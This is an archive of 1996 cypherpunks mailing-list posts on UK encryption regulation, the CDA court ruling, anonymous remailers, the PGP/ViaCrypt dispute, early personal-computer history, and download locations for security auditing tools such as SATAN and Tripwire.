From: "Mark M." <markm@voicenet.com>
Date: Thu, 13 Jun 1996 12:02:45 +0800
To: cypherpunks@toad.com
Subject: Quickremail update
Message-ID: <Pine.LNX.3.93.960612174315.1229A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have now released Quickremail v1.0.  This fixes a lot of the bugs present
in the beta version.  Some of the bugs were serious, so I would suggest
getting the newer version.  It is available at
http://www.voicenet.com/~markm/quickremail.1.0.tar.gz .

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMb87I7Zc+sv5siulAQE8dQP/Rrzvd4T/4vF5/KUmPA1mrhxxl+7Mosud
OqykU7Bcg5lMezYuW51eaHlQVqgeMhLaFopXth4su3S9DHB+wv1rYwo4rh8G4Gt9
h0EQ4ekhVi4tzzM1VChdkIE/ZrddvcqSoIvZqGOjv8UrvWxXoKoNQ65IKB+UHvvC
MQAZGT5KvUM=
=Gycx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Thu, 13 Jun 1996 12:00:21 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Britain to control crypto - official (fwd from Usenet)
In-Reply-To: <4plte7$70i@life.ai.mit.edu>
Message-ID: <31BF3BCA.794B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:
> 
> > The British government quietly announced yesterday that it will
> > legislate to restrict crypto.

This could be a problem. The government is pretty burned out having run out of
ideas a long time ago. Interferring with areas the people understand little of
is a way to avoid making worse mistakes.

Given that we have the worst Home Secretary this century there is little hope
that civil liberties will play any part in any legislation. For those that
don't follow UK politics the government has been methodically extinguishing
civil rights such as the right to demonstrate in public and the right of a
defendant to premptory challenge agains jurors (the prosecution retains the
right).

The key question is how urgently the govt intends to press the point. If they
attach a provision to pre-election criminal justice bill then expect a really
half baked clause. If they go for public comment gathering proceedures then
the govt. is likely to be out of office before anything happens.  With less
than half the public support of the opposition Bob Dole stands more chance of
election than the British Tories.
 
> Does anyone here have any idea what this does to british-affiliated states
> like Anguilla, or the Caymans?

Nothing in the case of most dependent territories. Most territories are either
entirely self governing or have some body which "assists" the govenor. 

Given that we have yet to unify English and Scottish law the process of making
laws is quite complex. Presumably the govt intend to pass laws covering the
whole of the UK, what mechanism they choose for this we will have to wait to
find out.

I would expect the Caymans to act to protect their tax-haven business. This
could mean that they are pro crypto (increase effectiveness) or may mean that
they go anti to avoid being seen as money laundering havens and invite Cuba
style sanctions acts.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.comhackerpunks-owner@alpha.c2.org
Date: Thu, 13 Jun 1996 14:58:54 +0800
To: cypherpunks@toad.com
Subject: HACKERPUNKS-OWNER ANSWERS YOUR QUESTIONS
Message-ID: <199606130119.SAA07044@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


As we expected - our Announcement-posting generated 
a number of lame Followups. Our Answers follow:

in LACC-Diggest Bill Unruh <unruh@physics.ubc.ca> wrote:

>Actually if I were a "haker" I would be far more worried that this is actually
>a FBI/CIA/NSA/... run site. It sure would be a convenient way to pick off
>whole loads of self styled hackers and tie them in to ongoing investigations.
>"nobody can find out who hides behind alpha.c2.org accounts"
>or who hides behind alpha.c2.org

HACKERPUNKS-OWNER ANSWERS: Actually if you were a "haker", 
you should be worried REGARDLESS of who runs this List: 
FBI/CIA/Stasi agents can trivially create an alias like 
FBI@alpha.c2.org and SUBSCRIBE to this List. They would
know all Information that is available to the List-owner,
except the subscriber-list. But, the subscriber-list is
useless because of Anonymity.

Even if alpha.c2.org were an FBI run Site, its Users
must use Anonymous-remailers to access it. That
preserves their Privasy.

in Newsgroups David Sternlight wrote:

>Remind anyone of the police department that anonymously announced a
>resisters' seminar on how to make bombs so they could find out who to
>watch?

HACKERPUNKS-OWNER ANSWERS: how can they find out who 
to watch if subscribers are Anonymous??

SINCLAIR  DOUGLAS N wrote in cypherpunks:
>I don't have a C2 account, and don't really want to pay for one.
>I trust someone will put the hackerpunks archives on the web so
>the rest of us can read them.

HACKERPUNKS-OWNER ANSWERS: alpha.c2.org Accounts are FREE.

Ecafe Mixmaster Remailer wrote in cypherpunks:
>There was a minor error in my earlier post. If someone were to notice a
>node on the internet receiving a bag with L(In)=L(Posted) *before* any
>other nodes on the internet, then one could guess that node had a user who
>was the owner of Hackerpunks.

HACKERPUNKS-OWNER ANSWERS: There is a minor Error in 
your current Post.  L(In) <> L(Posted) because of prepended
Headers. For Protection, hackerpunks List receives some 
Junk-mail, automatically trashed, to create Noise.

HACKERPUNKS-OWNER _A_D_V_I_S_E_S_ Sameer Parekh and 
GhiO to add Code to their Alpha-remailer to insert 
Random-Size Header 'X-Random-Noise:' before Encryption 
of Messages sent to Users of alpha.c2.org Accounts.
Other Remailers are advised to change the Size of
these Header Lines.

HACKERPUNKS List-bot adds a Random-size Kookie to every
outgoing Message to preserve Privacy of Subscribers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Thu, 13 Jun 1996 12:12:03 +0800
To: pgp-users@rivertown.net
Subject: Re: CDA decision TOMORROW 9 am! (fwd)
Message-ID: <m0uTyHX-00035cC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:47 AM 6/12/96 +0000, Omegaman wrote:
>Guess I was logged in at the right time this morning.  Judges ruled 
>3-0 that the CDA is unconstitutional.  hooray.
>
>I thought a little rejoicing was warranted. :)
>
>me
>------------------------------------------------------------
> Omegaman <omega@bigeasy.com>
> PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
>                                59 0A 01 E3 AF 81 94 63 
>------------------------------------------------------------
>
>
:-)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Thu, 13 Jun 1996 12:32:39 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: whitehouse queries files on political enemies
In-Reply-To: <4pj38q$o1i@life.ai.mit.edu>
Message-ID: <31BF463C.15FB@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> 
> OBCrypto: William Safire, in his 6/10/96 column on this subject, says,
> "Under Freeh, the anti-encryption zealot hand-picked by the man whose name
> was used on the phony requisitions, the Justice Department's most
> confidential file room has become a walk-in closet for White House pols."

Well Safire should know about Nixon type dirty tricks, after all he worked for
Nixon as a speachwriter and wrote a book about it:-

http://econ158.berkeley.edu/williamsafire.html
http://econ158.berkeley.edu/haldeman.html


>From a pro-crypto point of view it is more advantageous to accept the
administration position that the requests were made in error. After all that 
demonstrates that the govt. is not capable of admininistering sensitive 
information properly even when it is what must surely count as the most 
sensitive information the govt. tracks. If the system is ineffective in 
protecting the files of the party workers of opposed factions then it is 
unlikely to protect the secrecy of less sensitive files.

This aside the general problem is one of authorisation. The current USGovt 
security system is based on principles of security clearances and "need to 
know". But how does the guardian of various personal files know _who_ needs to 
know?

This is a _very_ hard problem, one that I for one would like an answer to.
Unfortunately the USGovt is not like a computer system where the authorisation
policy for information is enforced via ACLs or the like. Perhaps it should be 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 13 Jun 1996 10:08:00 +0800
To: Raph Levien <raph@kiwi.cs.berkeley.edu>
Subject: Re: Anonymous remailers mentioned in CDA decision
Message-ID: <199606121848.SAA05975@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The right to anonymity on the Net got a big boost during the Q&A at the
ACLU press conference here in NYC on the CDA win -- with a recitation of
its distinguished history in assuring freedom of speech and political
activity. As did the corollary right to strong encryption to assure
protection from intruders of gov-biz-jealous-lovers of all stripes. 
 
 
The CDA decision is a wondrous read for its coverage of so many topics
discussed here; each judge's opinion is separately admirable. 
 
 
And, based, on the remarks of panelists at the conference, it will surely
advance privacy protection measures and support loosening of crypto
controls. 
 
 
But still subject to the unpredictable Supremes, a Solomon cautioned, if
DoJ elects to appeal. 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 13 Jun 1996 17:22:46 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Kaos vs Control
Message-ID: <v02140b03ade52d8aa242@[17.128.201.161]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
>
>See, all you doubters, "anarchy" is not so bad after all.
>

Check out the article on Anarchy in the 11th (or 13th) edition of the
Encyclopaedia Brittanica. It was written by Prince Kropotkin
as a philosophical argument in favor of anarchy, and the editors
saw fit to write a rebuttal footnote referring, as I recall,
to the Haymarket (Pullman?) riots.

A copy of the 11th needs to be on everyone's bookshelf.

Martin.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 13 Jun 1996 13:42:00 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous remailers mentioned in CDA decision
In-Reply-To: <199606121848.SAA05975@pipe2.ny1.usa.pipeline.com>
Message-ID: <k4oFPD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jya@pipeline.com (John Young) writes:
> But still subject to the unpredictable Supremes, a Solomon cautioned, if
> DoJ elects to appeal.

This statute's language pretty much forces DOJ to appeal, even if they think
the law sucks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Fabbri <tomservo@access.digex.net>
Date: Thu, 13 Jun 1996 14:59:42 +0800
To: cypherpunks@toad.com
Subject: Re: Born Classified
In-Reply-To: <199606121924.MAA07982@samsparc2.baynetworks.com>
Message-ID: <v03006f00ade51ef4eb4c@[164.109.216.51]>
MIME-Version: 1.0
Content-Type: text/enriched

-----BEGIN PGP SIGNED MESSAGE-----

"Sam Bassett" writes:

>	According to "The Codebreakers" (if memory serves me), in about 1943
>the U.S. and the U.K. negotiated a BRITUS treaty, the details of which
were
>very secret.  I think that this was the original agreement to share the
>British Enigma cryptography results, and possibly the U.S. nuclear
results.
>	Further, I suspect that one of the provisions of the BRITUS treaty
>was that all of the crypto stuff be treated as if British Law (i.e. the
>Official Secrets Act) ruled -- everything was secret unless and until the
Government said it wasn't any more.

James Bamford mentions the BRUSA/UKUSA agreements in _The Puzzle Palace_
(p. 393ff. in mine). It doesn't say anything about nuclear secrets, but the
discussion does touch on cryptanalysis, COMINT and other technology (radar,
DF, etc.). From Bamford's description, it sounds as if each country just
agreed to be bound by the other's security regulations insofar as how they
handled material. This isn't uncommon. (Of course, that means that stuff
the Brits provided the US wasn't subject to the usual classification
review. . .)

>	This was mildly unconstitutional at the time, but could be gotten past
>the courts on the excuse that the Constitution defines treaties as "The
Highest
>Law of the Land".  It has certainly led to a lot of abuses since, but the
>bureaucrats love it -- "born classified", indeed!

As far as Constitutional abuses, there were much worse ones on the horizon
(e.g., the internment of Japanese-Americans). War hysteria provides fertile
ground to sow the seeds of FUD. (Gee, maybe that explains the "war on
drugs," the "war on crime," the "war on pornography". . .)

Scott

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMb9z0evEnOI8TfM9AQEFjQMAmrxE+tnlIfow4RZ80M2gnIdMsjHeJN6V
u3cQDVTohHYebmQ6UTWFh7gG+CPDEVe65ATTprHknp+yvOTetGTuzPDKAmi4Zme7
CfB9e+pcq9A9N6tqV+Gt6YbRuikT/KBQ
=dYHf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 13 Jun 1996 18:06:41 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <ade4f0aa050210044853@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:10 AM 6/13/96, Blake Wehlage wrote:
>Hey did any of you guys(and ladies) see the PBS show called, Triumph of the
>Nerds: The Rise of Accidental Empires in Silicon Valley. I thought it was
>very interesting and informative. (That's coming from a 13 year with the
>teachers say have no future) If you saw it I was wondering your feeling on
>the show.

I caught the show and thought it was pretty good, all in all.

I personally despise the term "nerd," but I won't get into that here.
(Except to say that "nerds," "geeks," and "dweebs" are terms of insult, and
anyone who accepts this labelling by the media and by "jerks" (a comparable
term, by the way) is proably just a dweeb anyone, so I guess the term is
accurate.)

Most of the portrayals of Silicon Valley history was pretty accurate,
especially the 1975-78 "Homebrew Computer Club" days. (I used to go to
about every other one of these, mainly in '77-78, where I sometimes passed
out free samples of the 8080 and stuff like that. A friend of mine at the
time was one of the Apple II motherboard designers, and another was the
first employee hired by Jobs and Woz. Personally, my first personal
computer was a Processor Technology SOL, as I thought the Apple II looked
too much like a toy. Shows you what I knew.)

The first "Byte Shop" opened in late '75 or early '76, a few miles from my
apartment, so I used to go there to see the new machines. This is the store
that bought the first batch of Apple Is (not IIs). Mainly I remember the
Altair, the IMSAI 8080, the Cromemco Dazzler, and so on.

Those were exciting times. But, having worked at Intel during those heady
days, and being pretty active these days on the Net, I'd have to say the
Web, Net, Java, etc. are *just as exciting* (if not more so) than those
days. So, the best years are probably yet to come.

(BTW, I also had an ARPANET account in 1973, when there were only several
sites as nodes.)

Back to the show...

Cringely (actually, Stephens) is pretty good at doing sidebars explaining
computers.

So, a pretty fair history of the industry. Probably the best such show I've
seen.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jun 1996 16:31:51 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Kaos vs Control
Message-ID: <2.2.32.19960613031048.00b411f8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:34 PM 6/12/96 -0700, Martin Minow wrote:

>A copy of the 11th needs to be on everyone's bookshelf.
>
>Martin.
>
>
>

The first volume (at least) of "The Encyclopedia Anglica" is available from
The Gutenberg Project.  It's the 11 ed. of the Brittanica but the name can't
be used.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Thu, 13 Jun 1996 15:58:26 +0800
To: cypherpunks@toad.com
Subject: PBS show
Message-ID: <m0uU2oX-00035aC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey did any of you guys(and ladies) see the PBS show called, Triumph of the
Nerds: The Rise of Accidental Empires in Silicon Valley. I thought it was
very interesting and informative. (That's coming from a 13 year with the
teachers say have no future) If you saw it I was wondering your feeling on
the show. 

Thank you.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 13 Jun 1996 17:07:50 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Anonymous remailers mentioned in CDA decision
In-Reply-To: <k4oFPD30w165w@bwalk.dm.com>
Message-ID: <EljtUzK00YUyR7NsIY@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 12-Jun-96 Re: Anonymous remailers
men.. by Dr.Dimitri V. KOTM@bwalk 
> This statute's language pretty much forces DOJ to appeal, even if they think
> the law sucks.

What, precisely, in the statute's language *forces* the DoJ to appeal?

It is the Solicitor General's decision. At close of business today, the
DoJ still hadn't told me whether they would or not. But we expect they
will.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 13 Jun 1996 19:51:43 +0800
To: cypherpunks@toad.com
Subject: Re: Insults (was: PBS show)
Message-ID: <199606130747.AAA26956@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
>I personally despise the term "nerd," but I won't get into that here.
>(Except to say that "nerds," "geeks," and "dweebs" are terms of insult, and
>anyone who accepts this labelling by the media and by "jerks" (a comparable
>term, by the way) is proably just a dweeb anyone, so I guess the term is
>accurate.)

IMHO the best way to deal with an insult is to make it a badge of pride. 
This is how my ancestors in revolutionary New England dealt with being
called Yankees.  It beats hell out of trying to force the rest of the world
to call your group something different every 10 years of so, like some
groups have been doing.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 13 Jun 1996 14:19:54 +0800
To: cypherpunks@toad.com
Subject: UK's Trusted Third Parties
Message-ID: <199606130057.AAA26008@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Thanks to Professor Denning's pointer to this URL for the 
   UK's Trusted Third Parties regulatory intent. 
 
      http://dtiinfo1.dti.gov.uk/cii/encrypt/ 
 
 
   June 11, 1996 
 
 
   STATEMENT ON HMG POLICY CONCERNING USE OF ENCRYPTION ON 
   PUBLIC NETWORKS 
 
 
   PAPER ON REGULATORY INTENT CONCERNING USE OF ENCRYPTION ON 
   PUBLIC NETWORKS 
 
   1.  Summary 
 
   The Government recognises the importance of the development 
   of the Global Information Infrastructure (GII) with respect 
   to the continuing competitiveness of UK companies. Its aim 
   is to facilitate the development of electronic commerce by 
   the introduction of measures which recognise the growing 
   demand for encryption services to safeguard the integrity 
   and confidentiality of electronic information transmitted 
   on public telecommunications networks. 
 
   2.  The policy, which has been decided upon after detailed 
   discussion between Government Departments, involves the 
   licensing and regulation of Trusted Third Parties 
   (hereafter called TTPs) which will provide a range of 
   information security services to their clients, whether 
   they are corporate users or individual citizens. The 
   provision of such information security services will be 
   welcomed by IT users, and will considerably facilitate the 
   establishment of, and industry's participation in, the GII,  
   where trust in the security of communication has been 
   acknowledged to be of paramount importance. The licensing 
   policy will aim to preserve the ability of the intelligence 
   and law enforcement agencies to fight serious crime and 
   terrorism by establishing procedures for disclosure to them 
   of encryption keys, under safeguards similar to those which 
   already exist for warranted interception under the 
   Interception of Communications Act.   
 
   3.  The Government intends to bring forward proposals for 
   legislation following consultation by the Department of 
   Trade and Industry on detailed policy proposals. 
 
   [Balance snipped] 
 
---------- 
 
   Professor Denning also has comments dated June 11 on the 
   NRC cryptography report: 
 
      http://www.cosc.georgetown.edu/~denning/crypto/NRC.txt 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Thu, 13 Jun 1996 22:15:56 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Re: Zimmerman/ViaCrypt?
Message-ID: <0PggPD7w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh recently posted,

    *Has there been any news recently about what's going on with
    commercial versions of PGP?  I've been toying with the idea of
    buying the Windows version from ViaCrypt just to have a PGP that
    doesn't need to shell out to DOS each time it runs, but I'm
    curious as to where, if anywhere, things seem to be going.

First, unless there's been a new release, the so-called Windows
version of ViaCrypt is just a Windows shell that still creates a DOS
window to run PGP. It's a pretty good shell, and it's easy to install,
but that's about it.

There was a big discussion recently on alt.security.pgp about PRZ and
ViaCrypt.  Apparently Phil now wants to produce his own commercial
version of PGP and has "requested" ViaCrypt to sell back the
commercial rights under threat of a lawsuit if they don't.

Phil disagrees with ViaCrypts new "business" version of PGP which
apparently encrypts all messages with an employer-supplied public key
in addition to any specified by the employee.  ViaCrypt has their side
of the argument on their web page.

   http://www.viacrypt.com/

The basis of the possible lawsuit would be that ViaCrypt violated
their agreement not to put any "back door" into any product with the
PGP name. Whether the "business version feature" could be defined as a
"back door" would be the crux of the argument.

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve O <privsoft@ix.netcom.com>
Date: Fri, 14 Jun 1996 05:23:08 +0800
To: cypherpunks@toad.com
Subject: Tripwire and SATAN for Linux
Message-ID: <1.5.4.16.19960613093127.090fc37a@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys,
        Can any one point to where i can get Tripwire and SATAN for Linux?
a friend is in dire need. thanks...

Steve O
 Steve O.

"True Utopia can only be reached by an uncensored and secure Internet,
	True Chaos can only be reached by the government,
		True love can only be reached in the movies."
S.O.

"Bang your head, Metal Health will drive you mad!"
Quiet Riot

"Welcome my friend, Welcome to The Machine"
Pink Floyd

"Lonelyness and Emptiness;
 Love and Fulfillment;
 Are all but flashes 
 in the eye of the storm
 of our tormented soul."
S.O.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 14 Jun 1996 08:52:31 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606131636.JAA22527@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:

>
>Most of the portrayals of Silicon Valley history was pretty accurate,
>especially the 1975-78 "Homebrew Computer Club" days. (I used to go to
>about every other one of these, mainly in '77-78, where I sometimes passed
>out free samples of the 8080 and stuff like that. A friend of mine at the
>time was one of the Apple II motherboard designers, and another was the
>first employee hired by Jobs and Woz. Personally, my first personal
>computer was a Processor Technology SOL, as I thought the Apple II looked
>too much like a toy. Shows you what I knew.)

But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 
key, upper-case only, 40-character wide display, odd microprocessor, VERY 
SMALL capacity floppies (which were very slow as well), as well as a hostile 
legal situation regarding the building of clones.  Hell, they even objected 
to other companies building boards which plugged into the bus!

Personally, I soured on the Apple II when I followed EDN magazine's attempt 
to build an engineering system with it, called "Project Indecomp."  They ran 
into a boneheaded design problem with the Apple, due to improper clock 
synchronization and bus timing.  They gave up the project, concluding that 
the Apple II was brain-dead.

BTW, Intel shares a substantial proportion of the blame for Apple's choice 
of the 6502.  The decision was made, I've heard, because Intel was still 
trying to get $200 for a slow 8080, while Western Design Center (?) wanted 
only about $20 for a 6502.

And by refusing to build Masatoshi (?) Shima's design for the Z-80, they 
totally lost the race for the 8-bit PC world.  The Z-80 turned into the 
highest-volume 8-bit microprocessor by far, leaving both the 8080 and the 
8085 in the dust, and even the 6502.

I have other, even harsher word for the design of the IBM PC.  Oh yes, the 
Mac sucks bigtime as well, although primarily for legal reasons.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel Salenger" <dsalenger@dttus.com>
Date: Fri, 14 Jun 1996 14:10:35 +0800
To: cypherpunks@toad.com
Subject: CDA & Clinton
Message-ID: <9605138347.AA834715665@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     It looks as though even after the temporary court injunction against 
     major portions of the CDA, Clinton still wants to push it:
     
     http://www.yahoo.com/headlines/960612/news/stories/internet_4.html
     
     Very unfortunate.  Please protect us from ourselves Bill.
     
     
     Dan Salenger
     dsalenger@dttus.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 14 Jun 1996 03:32:02 +0800
To: cypherpunks@toad.com
Subject: Re: Kaos vs Control
Message-ID: <2.2.32.19960613140607.0075f970@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 AM 6/12/96 -0700, Timothy C. May wrote:
>I see little chance that people who don't
>understand anarchy derives from "an-archy," "no top/leader/highest level,"
>will become educated.)

Unless they choose "anarchy" without even knowing it.  As in my Gallup Poll
question to "prove" that 90% of Americans are anarchists:

"Some groups advocate aggressive violence as a means of achieving social
ends.  Do you agree with them?  Do you advocate aggressive violence as a
means of achieving social ends?"

So 90% of the population answer "No" and demonstrate that they are either
anarchists or don't understand the nature of government.

>Good to see the courts reaffirming that "chaos" and lack of control by
>authorities is a core part of the U.S. system. Maybe the control freaks of
>Europe and Asia who have been charting their own authoritarian courses will
>give more thought to ensuring liberty even if it causes more "chaos."

One would hope.  Perhaps reality will have to do it for them.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 14 Jun 1996 09:56:40 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <ade59c7b06021004a5fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:35 PM 6/13/96, jim bell wrote:
>At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
...
>>first employee hired by Jobs and Woz. Personally, my first personal
>>computer was a Processor Technology SOL, as I thought the Apple II looked
>>too much like a toy. Shows you what I knew.)
>
>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset
>key, upper-case only, 40-character wide display, odd microprocessor, VERY
>SMALL capacity floppies (which were very slow as well), as well as a hostile
>legal situation regarding the building of clones.  Hell, they even objected
>to other companies building boards which plugged into the bus!

Compared to my SOL, the Apple II would've been more useful, in retrospect.
As to the 40-character display, that was the norm in those days. (My SOL,
and certainly the other machines available to home users at that time, had
only a 40-character-wide display...when in worked.)

The comments about the floppies (" VERY SMALL capacity floppies (which were
very slow as well") is even more off-base. In fact, it was probably Apple's
ability to put _any_ kind of floppies on the Apple II, for a reasonable
price, that ensured its success. Processor Technology was effectively sunk
by delays in getting its "Helios" 8-inch floppy drive working. The bigger
and faster 8-inchers may have been technically superior to Apple's
"Integrated Woz Machine" drivers and 5-inch floppies, but Apple was
shipping. That counts for a _lot_.

>BTW, Intel shares a substantial proportion of the blame for Apple's choice
>of the 6502.  The decision was made, I've heard, because Intel was still
>trying to get $200 for a slow 8080, while Western Design Center (?) wanted
>only about $20 for a 6502.

You need to check your claims more carefully. There are always many reasons
a chip is selected for a design.

>And by refusing to build Masatoshi (?) Shima's design for the Z-80, they
>totally lost the race for the 8-bit PC world.  The Z-80 turned into the
>highest-volume 8-bit microprocessor by far, leaving both the 8080 and the
>8085 in the dust, and even the 6502.

Again, your understanding of the history of Intel, Zilog, and the industry
in general is lacking.

The design and process technology resources were instead committed to the
8086, and history is rather clear about the wisdom of doing that. Intel is
now capitalized at something like $50-70 billion, and Zilog is no longer on
the radar screen.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 14 Jun 1996 09:50:28 +0800
To: Steve O <cypherpunks@toad.com
Subject: Re: Tripwire and SATAN for Linux
Message-ID: <199606131803.LAA07464@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:25 AM 6/13/96 -0700, Steve O wrote:
>Hey guys,
>        Can any one point to where i can get Tripwire and SATAN for Linux?
>a friend is in dire need. thanks...

>From the notes passed out at Venema and Farmer's "Security Auditing and
Risk Analysis" class:

Archive locations for important auditing software:

COPS            http://www.fish.com/security/cops
Crack           ftp://ftp.win.tue.nl/pub/security/
ipsend (part of
        the IP
        Filter
        package) ftp://coombs.an.edu.au/pub/net/kernel/ip-fil3.0.4.tar.gz
lsof            ftp://coast.cs.perdue.edu/pub/tools/lsof
SATAN           ftp://ftp.win.tue.nl/pub/security/satan.tar.Z
Tiger           ftp://net.tamu.edu/pub/security/TAMU


Also try:

CERT            ftp://cert.org
Gene Spafford   http:/coast.cs.perdue.edu
Wietse Venma    ftp://ftp.win.tue.nl/pub/security


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
